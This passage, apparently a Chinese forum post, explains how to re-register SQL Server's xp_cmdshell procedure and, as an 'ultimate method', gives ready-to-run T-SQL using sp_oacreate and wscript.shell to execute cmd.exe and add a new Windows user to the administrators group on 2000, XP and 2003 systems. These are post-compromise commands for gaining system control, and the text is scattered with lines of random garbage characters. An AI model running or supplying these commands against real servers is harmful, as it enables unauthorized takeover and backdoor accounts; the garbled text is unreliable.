3 ~1 g: {! Q8 g- k* v4 E( z第一步执行：sp_dropextendedproc "xp_cmdshell"
第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
9 T: y  t; c3 l: u; F然后按F5键命令执行完毕
* ]) e+ p% T0 Z8 m3 m+ a4 \
2 H. R# v9 p: j# l3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法：查询分离器连接后,
! n. k# ?: v: {5 R第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
然后按F5键命令执行完毕
* s$ N( T. w6 y( y2 B
四.终极方法.
+ X/ Y6 C, d: g4 L如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
. b% U% a' b6 ^/ [查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
" C  q. G4 y4 ~) j
7 D+ @5 b; k% V$ }) n- P$ Fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 n- U/ w9 k; `  k8 j- s# r3 X
0 N; c1 w2 n1 b0 y( ?; yxp或2003server系统:

7 ?/ p# _( `# x! C* K5 {4 s2 L" _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
+ g4 U/ ^5 P- @4 M2 f